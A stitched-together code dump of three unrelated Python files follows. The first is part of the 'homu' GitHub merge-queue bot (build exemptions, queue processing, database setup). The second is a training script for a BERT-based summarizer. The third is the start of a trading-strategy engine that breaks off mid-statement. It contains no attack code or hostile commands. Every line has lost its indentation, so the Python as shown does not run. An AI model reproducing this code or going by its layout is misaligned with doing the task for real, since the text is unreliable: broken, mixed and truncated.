def try_travis_exemption(state, logger, repo_cfg, git_cfg):
travis_info = None
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
travis_info = info
break
if travis_info is None or travis_info.state != 'success':
return False
mat = re.search('/builds/([0-9]+)$', travis_info.target_url)
if not mat:
return False
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner,
state.name,
mat.group(1))
try:
res = requests.get(url)
except Exception as ex:
print('* Unable to gather build info from Travis CI: {}'.format(ex))
return False
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if not travis_commit:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if (travis_commit.parents[0]['sha'] == base_sha and
travis_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg,
travis_info.target_url, True,
"merge already tested by Travis CI")
return False
def try_status_exemption(state, logger, repo_cfg, git_cfg):
# If all the builders are status-based, then we can do some checks to
# exempt testing under the following cases:
# 1. The PR head commit has the equivalent statuses set to 'success' and
# it is fully rebased on the HEAD of the target base ref.
# 2. The PR head and merge commits have the equivalent statuses set to
# state 'success' and the merge commit's first parent is the HEAD of
# the target base ref.
if not git_cfg['local_git']:
raise RuntimeError('local_git is required to use status exemption')
statuses_all = set()
# equivalence dict: pr context --> auto context
status_equivalences = {}
for key, value in repo_cfg['status'].items():
context = value.get('context')
pr_context = value.get('pr_context', context)
if context is not None:
statuses_all.add(context)
status_equivalences[pr_context] = context
assert len(statuses_all) > 0
# let's first check that all the statuses we want are set to success
statuses_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_pass.add(status_equivalences[info.context])
if statuses_all != statuses_pass:
return False
# is the PR fully rebased?
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', False,
"pull fully rebased and already tested")
# check if we can use the github merge sha as proof
merge_sha = get_github_merge_sha(state, repo_cfg, git_cfg)
if merge_sha is None:
return False
statuses_merge_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), merge_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_merge_pass.add(status_equivalences[info.context])
merge_commit = state.get_repo().commit(merge_sha)
if (statuses_all == statuses_merge_pass and
merge_commit.parents[0]['sha'] == base_sha and
merge_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', True,
"merge already tested")
return False
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
lazy_debug(logger, lambda: "start_build on {!r}".format(state.get_repo()))
pr = state.get_repo().pull_request(state.num)
assert state.head_sha == pr.head.sha
assert state.base_ref == pr.base.ref
repo_cfg = repo_cfgs[state.repo_label]
builders = []
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
can_try_travis_exemption = False
only_status_builders = True
if 'buildbot' in repo_cfg:
if state.try_:
builders += repo_cfg['buildbot']['try_builders']
else:
builders += repo_cfg['buildbot']['builders']
only_status_builders = False
if 'travis' in repo_cfg:
builders += ['travis']
only_status_builders = False
if 'status' in repo_cfg:
found_travis_context = False
for key, value in repo_cfg['status'].items():
context = value.get('context')
if context is not None:
if state.try_ and not value.get('try', True):
# Skip this builder for tries.
continue
builders += ['status-' + key]
                # We have an optional fast path: if the Travis test passed
                # for a given commit and master is unchanged, we can do
                # a direct push.
if context == 'continuous-integration/travis-ci/push':
found_travis_context = True
if found_travis_context and len(builders) == 1:
can_try_travis_exemption = True
if 'checks' in repo_cfg:
builders += [
'checks-' + key
for key, value in repo_cfg['checks'].items()
if 'name' in value or (state.try_ and 'try_name' in value)
]
only_status_builders = False
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
lazy_debug(logger, lambda: "start_build: builders={!r}".format(builders))
if (only_status_builders and state.approved_by and
repo_cfg.get('status_based_exemption', False)):
if can_try_travis_exemption:
if try_travis_exemption(state, logger, repo_cfg, git_cfg):
return True
if try_status_exemption(state, logger, repo_cfg, git_cfg):
return True
merge_sha = create_merge(state, repo_cfg, branch, logger, git_cfg)
lazy_debug(logger, lambda: "start_build: merge_sha={}".format(merge_sha))
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(
state.owner,
state.name,
state.num,
branch,
state.merge_sha))
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
desc = '{} commit {} with merge {}...'.format(
'Trying' if state.try_ else 'Testing',
state.head_sha,
state.merge_sha,
)
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
desc,
context='homu')
if state.try_:
state.add_comment(comments.TryBuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
else:
state.add_comment(comments.BuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
_parents = state.get_repo().commit(state.merge_sha).parents
parent_shas = [x['sha'] for x in _parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(
state.get_repo(),
'tags/homu-tmp',
state.merge_sha,
force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err)) # noqa
return False
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders)) # noqa
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders)) # noqa
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
'{}{}...'.format(msg_1, msg_3),
context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db,
git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
lazy_debug(logger, lambda: "process_queue: state={!r}, building {}"
.format(state, repo_label))
if state.priority < repo.treeclosed:
continue
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'): # noqa
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots,
logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by: # noqa
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
pull_request = state.get_repo().pull_request(state.num)
if pull_request is None or pull_request.mergeable is None:
time.sleep(5)
pull_request = state.get_repo().pull_request(state.num)
mergeable = pull_request is not None and pull_request.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat:
issue_or_commit = '#' + mat.group(1)
else:
issue_or_commit = cause['sha']
else:
issue_or_commit = ''
_blame = ''
if issue_or_commit:
_blame = ' (presumably {})'.format(issue_or_commit)
state.add_comment(
':umbrella: The latest upstream changes{} made this '
'pull request unmergeable. Please [resolve the merge conflicts]' # noqa
'(https://rustc-dev-guide.rust-lang.org/git.html#conflicts).' # noqa
.format(_blame)
)
state.change_labels(LabelEvent.CONFLICT)
state.set_mergeable(mergeable, que=False)
except Exception:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels): # noqa
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = Repository(repo, repo_label, db)
for pull in repo.iter_pulls(state='open'):
db_query(
db,
'SELECT status FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = pull.title
state.body = suppress_pings(pull.body)
state.body = suppress_ignore_block(state.body)
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def process_config(config):
# Replace environment variables
if type(config) == str:
for var in VARIABLES_RE.findall(config):
try:
config = config.replace("${"+var+"}", os.environ[var])
except KeyError:
raise RuntimeError(
f"missing environment variable ${var} "
f"(requested in the configuration file)"
) from None
return config
# Recursively apply the processing
elif type(config) == list:
return [process_config(item) for item in config]
elif type(config) == dict:
return {key: process_config(value) for key, value in config.items()}
# All other values should be returned as-is
else:
return config
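# Illustrative sketch (not part of homu itself): process_config recursively walks
# strings, lists and dicts, replacing ${VAR} placeholders with values taken from
# the environment. The variable name below is made up for the example.
#
#     os.environ['HOMU_GH_TOKEN'] = 'xxx'
#     cfg = {'github': {'access_token': '${HOMU_GH_TOKEN}'}}
#     cfg = process_config(cfg)
#     # cfg['github']['access_token'] is now 'xxx'; a missing variable
#     # raises RuntimeError instead.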
def arguments():
parser = argparse.ArgumentParser(
description='A bot that integrates with GitHub and your favorite '
'continuous integration service')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='Enable more verbose logging')
parser.add_argument(
'-c',
'--config',
action='store',
help='Path to cfg.toml',
default='cfg.toml')
return parser.parse_args()
def main():
global global_cfg
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
if sys.getfilesystemencoding() == 'ascii':
logger.info('You need to set a locale compatible with unicode or homu will choke on Unicode in PR descriptions/titles. See http://stackoverflow.com/a/27931669') # noqa
try:
with open(args.config) as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
# Fall back to cfg.json only if we're using the defaults
if args.config == 'cfg.toml':
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
else:
raise
cfg = process_config(cfg)
global_cfg = cfg
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
cfg_git = cfg.get('git', {})
user_email = cfg_git.get('email')
if user_email is None:
try:
user_email = [x for x in gh.iter_emails() if x['primary']][0]['email'] # noqa
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted') # noqa
user_name = cfg_git.get('name', user.name if user.name else user.login)
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user_name,
'email': user_email,
'ssh_key': cfg_git.get('ssh_key', ''),
'local_git': cfg_git.get('local_git', False),
'cache_dir': cfg_git.get('cache_dir', 'cache')
}
db_file = cfg.get('db', {}).get('file', 'main.db')
db_conn = sqlite3.connect(db_file,
check_same_thread=False,
isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
squash INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS repos (
repo TEXT NOT NULL,
treeclosed INTEGER NOT NULL,
treeclosed_src TEXT,
UNIQUE (repo)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS retry_log (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
time DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
src TEXT NOT NULL,
msg TEXT NOT NULL
)''')
db_query(db, '''
CREATE INDEX IF NOT EXISTS retry_log_time_index ON retry_log
(repo, time DESC)
''')
# manual DB migration :/
try:
db_query(db, 'SELECT treeclosed_src FROM repos LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE repos ADD COLUMN treeclosed_src TEXT')
try:
db_query(db, 'SELECT squash FROM pull LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE pull ADD COLUMN squash INT')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
# If test-on-fork is enabled point both the main repo and the fork to
# the same homu "repository". This will allow events coming from both
# GitHub repositories to be processed the same way.
if 'test-on-fork' in repo_cfg:
tof = repo_cfg['test-on-fork']
repo_labels[tof['owner'], tof['name']] = repo_label
repo_states = {}
repos[repo_label] = Repository(None, repo_label, db)
db_query(
db,
'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate, merge_sha FROM pull WHERE repo = ?', # noqa
[repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate, merge_sha in db.fetchall(): # noqa
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = rollup
state.squash = bool(squash)
state.delegate = delegate
builders = []
if merge_sha:
if 'buildbot' in repo_cfg:
builders += repo_cfg['buildbot']['builders']
if 'travis' in repo_cfg:
builders += ['travis']
if 'status' in repo_cfg:
builders += ['status-' + key for key, value in repo_cfg['status'].items() if 'context' in value] # noqa
if 'checks' in repo_cfg:
builders += ['checks-' + key for key, value in repo_cfg['checks'].items() if 'name' in value] # noqa
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(
db,
'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res:
raise KeyError
if state.merge_sha != merge_sha:
raise KeyError
except KeyError:
db_query(
db,
'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', # noqa
[repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try:
state = states[repo_label][num]
except KeyError:
db_query(
db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg) # noqa
os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py') # noqa
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(
target=server.start,
args=[
cfg,
states,
queue_handler,
repo_cfgs,
repos,
logger,
buildbot_slots,
my_username,
db,
repo_labels,
mergeable_que,
gh,
]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
queue_handler()
if __name__ == '__main__':
main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_pretrained_bert import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
# device and device_id were not defined in this scope; derive them the same
# way the other entry points (train/validate/test) do
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
logger.info('Initializing training (device id %d)' % device_id)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
# Data loading
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# Summarizer: what is this for and how does it build the model? Worth a closer look.
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
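# Example invocations (illustrative only; paths are placeholders, adjust them
# to your setup):
#
#   python train.py -mode train -encoder transformer -world_size 1 -gpu_ranks 0 \
#       -bert_data_path ../bert_data/cnndm -model_path ../models/
#   python train.py -mode validate -test_all True -model_path ../models/
#
# With -world_size greater than 1, multi_main() spawns one training process per
# GPU listed in -gpu_ranks.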
|
strategy_engine.py
|
# -*- coding: utf-8 -*-
import sys
import platform
import threading
import traceback
from queue import Queue, Empty
from .client_api import *
class Engine(object):
handle = None
if platform.system() == 'Windows':
client_api = ClientAPI('./swordfish_api/client_api.dll')
elif platform.system() == 'Darwin':
client_api = ClientAPI('./swordfish_api/libclient_api.dylib')
else:
raise Exception(f"不支持的操作系统{platform.system()}")
is_quit = False
trd_stream = ""
mkt_stream = ""
req_stream = ""
strategy_name = ""
strategy_path = ""
cl_env_id = 1
strategy_id = 0
strategy_ord_id = 0
msg_queue = Queue()
def init(handle):
Engine.handle = handle
Engine.trd_stream = sys.argv[1]
Engine.mkt_stream = sys.argv[2]
Engine.req_stream = sys.argv[3]
Engine.strategy_name = sys.argv[4]
Engine.strategy_path = sys.argv[8]
Engine.cl_env_id = int(sys.argv[5])
Engine.strategy_id = int(sys.argv[6])
Engine.strategy_ord_id = int(sys.argv[7])
print("strategy_path:", Engine.strategy_path)
Engine.client_api.client_async_api_init(Engine.trd_stream, Engine.mkt_stream, Engine.req_stream,
